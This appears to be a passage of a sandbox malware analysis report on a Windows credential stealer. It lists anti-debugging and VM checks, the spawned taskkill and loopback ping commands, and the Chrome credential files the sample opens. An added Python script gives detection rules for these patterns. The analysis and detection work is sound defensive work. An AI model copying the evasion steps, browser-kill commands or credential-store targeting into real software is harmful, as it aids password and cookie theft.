Source: ecvFEAD.tmp.9.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20200930T152706Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9464ba7a943c4f4990f3a39a7d804c7f&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663574&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663574&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 56BB1610C0318054.exe, 00000002.00000003.387787563.0000000003D61000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}`
Source: 56BB1610C0318054.exe, 00000002.00000003.390150062.0000000003DA5000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000003.390150062.0000000003DA5000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.378507554.00000000028A6000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Cyfj6XGbkd.exe, 00000000.00000002.365647493.000000000088D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000004.00000003.371196297.00000000005A6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: 56BB1610C0318054.exe, 00000004.00000003.368996807.0000000002A04000.00000004.00000040.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}#V
Source: 56BB1610C0318054.exe, 00000004.00000002.377144897.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWocal Area Connection* 8-QoS Packet Scheduler-0000
Source: 56BB1610C0318054.exe, 00000004.00000002.377144897.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 56BB1610C0318054.exe, 00000004.00000003.368954748.00000000028A1000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}GU
Source: 56BB1610C0318054.exe, 00000002.00000003.369180667.0000000002261000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.378507554.00000000028A6000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 56BB1610C0318054.exe, 00000002.00000002.413280132.0000000002389000.00000004.00000001.sdmpBinary or memory string: 25-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000002.412922141.000000000079A000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
Source: 56BB1610C0318054.exe, 00000002.00000003.387577851.0000000003D76000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000004.00000002.378670009.0000000002A09000.00000004.00000001.sdmpBinary or memory string: 25-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}#V
Source: 56BB1610C0318054.exe, 00000002.00000003.387787563.0000000003D61000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: C:\Users\user\AppData\Roaming\1611970637183.exeProcess information queried: ProcessInformation

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019FF0 GetCurrentProcess,CheckRemoteDebuggerPresent,
Hides threads from debuggers
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeThread information set: HideFromDebugger
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugPort
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugObjectHandle
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess queried: DebugFlags
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403E2C rdtsc
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A010 IsDebuggerPresent,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019DE0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10019ED0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000E90E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,
Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10015354 SetUnhandledExceptionFilter,__encode_pointer,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10015376 __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10018413 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000E44D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000EFFC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099461F SetUnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00991C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A0F0 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001779F cpuid
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: GetLocaleInfoA,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10015254 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA,
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences
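Two of the behaviours recorded above are easy to turn into detection logic: the `cmd.exe -> PING.EXE ping 127.0.0.1 -n 3` chains (ping used as a sleep), and `taskkill /f /im chrome.exe` being run shortly before the dropped 56BB1610C0318054.exe opens Chrome's Login Data, Cookies and Web Data files (Chrome holds those SQLite databases locked while it runs, which is why a stealer kills it first). The script below is an added example, not part of this report or the sample; the event records, PIDs, timestamps and the cmd.exe command lines are constructed to mirror the report's process tree and are assumptions.

```python
"""Detection rules for ping-as-sleep and browser-kill-then-credential-access.
Added example (not Joe Sandbox code); SAMPLE_EVENTS is constructed to mirror
the report's process tree, with assumed PIDs, timestamps and command lines."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Set

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe"}
CHROME_USER_DATA = "\\google\\chrome\\user data\\"
CREDENTIAL_STORES = {"login data", "cookies", "web data"}
LOOPBACK = {"127.0.0.1", "localhost", "::1"}

@dataclass
class Event:
    ts: datetime
    kind: str     # "process" (creation) or "file_open"
    pid: int      # created process for "process", opener for "file_open"
    ppid: int
    image: str    # image path of pid
    detail: str   # command line for "process", opened path for "file_open"

def _basename(path: str) -> str:
    return path.strip('"').replace("\\", "/").rsplit("/", 1)[-1].lower()

def is_ping_sleep(cmdline: str) -> bool:
    """'ping <loopback> -n N' with N > 1 blocks for about N-1 seconds and has
    no diagnostic value on loopback: that is the ping-as-sleep idiom."""
    argv = cmdline.split()
    if not argv or _basename(argv[0]) not in ("ping", "ping.exe"):
        return False
    if not any(a.lower() in LOOPBACK for a in argv[1:]):
        return False
    for i, a in enumerate(argv[:-1]):
        if a.lower() == "-n" and argv[i + 1].isdigit():
            return int(argv[i + 1]) > 1
    return False

def killed_browser(cmdline: str) -> Optional[str]:
    """Return the browser image if cmdline is 'taskkill /f /im <browser>'."""
    argv = [a.strip('"').lower() for a in cmdline.split()]
    if not argv or _basename(argv[0]) not in ("taskkill", "taskkill.exe"):
        return None
    if "/f" not in argv or "/im" not in argv[:-1]:
        return None
    target = argv[argv.index("/im") + 1]
    return target if target in BROWSER_IMAGES else None

def opened_credential_store(path: str) -> bool:
    low = path.lower()
    return CHROME_USER_DATA in low and low.rsplit("\\", 1)[-1] in CREDENTIAL_STORES

def ancestors(pid: int, parents: Dict[int, int]) -> Set[int]:
    # every ancestor PID of pid that we learned from process-creation events
    seen: Set[int] = set()
    while pid in parents and parents[pid] not in seen:
        pid = parents[pid]
        seen.add(pid)
    return seen

def detect(events: List[Event], window: timedelta = timedelta(seconds=120)) -> List[str]:
    """Replay events in time order; one finding string per rule match."""
    parents: Dict[int, int] = {}
    kills = []  # (ts, pid of the taskkill process, browser image)
    findings: List[str] = []
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "process":
            parents[ev.pid] = ev.ppid
            if is_ping_sleep(ev.detail):
                findings.append(f"ping-sleep: pid {ev.pid} ran {ev.detail!r}")
            browser = killed_browser(ev.detail)
            if browser:
                kills.append((ev.ts, ev.pid, browser))
        elif ev.kind == "file_open" and opened_credential_store(ev.detail):
            if _basename(ev.image) in BROWSER_IMAGES:
                continue  # the browser reading its own profile is normal
            findings.append(f"credential-store-access: pid {ev.pid} opened {ev.detail}")
            for kts, kpid, browser in kills:
                # the opener must be an ancestor of a taskkill that ran shortly before
                if timedelta(0) <= ev.ts - kts <= window and ev.pid in ancestors(kpid, parents):
                    findings.append(f"browser-kill-then-steal: {browser} killed by pid {kpid}, "
                                    f"then pid {ev.pid} opened {ev.detail}")
    return findings

T0 = datetime(2021, 1, 29, 12, 0, 0)  # constructed timestamps
PROFILE = "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\"
STEALER = "C:\\Users\\user\\AppData\\Local\\Temp\\56BB1610C0318054.exe"
SAMPLE_EVENTS = [  # constructed from the report's process tree
    Event(T0, "process", 100, 1, "C:\\Users\\user\\Desktop\\Cyfj6XGbkd.exe", "Cyfj6XGbkd.exe"),
    Event(T0 + timedelta(seconds=2), "process", 200, 100, STEALER, "56BB1610C0318054.exe"),
    Event(T0 + timedelta(seconds=5), "process", 300, 200, "C:\\Windows\\SysWOW64\\cmd.exe", 'cmd /c "taskkill /f /im chrome.exe"'),
    Event(T0 + timedelta(seconds=5), "process", 301, 300, "C:\\Windows\\SysWOW64\\taskkill.exe", "taskkill /f /im chrome.exe"),
    Event(T0 + timedelta(seconds=6), "process", 310, 200, "C:\\Windows\\SysWOW64\\cmd.exe", 'cmd /c "ping 127.0.0.1 -n 3"'),
    Event(T0 + timedelta(seconds=6), "process", 311, 310, "C:\\Windows\\SysWOW64\\PING.EXE", "ping 127.0.0.1 -n 3"),
    Event(T0 + timedelta(seconds=8), "file_open", 200, 100, STEALER, PROFILE + "Login Data"),
    Event(T0 + timedelta(seconds=9), "file_open", 200, 100, STEALER, PROFILE + "Cookies"),
    Event(T0 + timedelta(seconds=20), "process", 401, 400, "C:\\Windows\\System32\\PING.EXE", "ping 192.168.2.1 -n 1"),
    Event(T0 + timedelta(seconds=30), "file_open", 500, 1, "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", PROFILE + "Login Data"),
]

def run_demo() -> List[str]:
    return detect(SAMPLE_EVENTS)
```

Run against the constructed events this yields five findings: one ping-sleep (the loopback ping with `-n 3`; the `-n 1` probe to 192.168.2.1 is ignored), two credential-store accesses by the dropped executable, and two kill-then-steal correlations, because the taskkill process's ancestry (taskkill.exe -> cmd.exe -> 56BB1610C0318054.exe) leads back to the process that opened the files. Chrome opening its own profile is excluded. In production the "process" events map to process-creation telemetry such as Sysmon Event ID 1 and the "file_open" events to an EDR's file-access stream; the correlation only works if the parent PID is carried along, so keep it in the schema.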

Mitre Att&ck Matrix

Numbers after a technique are the counts shown in the report's matrix; cells without a number are the matrix template, not observed behaviour.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Replication Through Removable Media 1 | Windows Management Instrumentation 1 | DLL Side-Loading 1 | DLL Side-Loading 1 | Disable or Modify Tools 1 | OS Credential Dumping 1 | System Time Discovery 1 | Replication Through Removable Media 1 | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
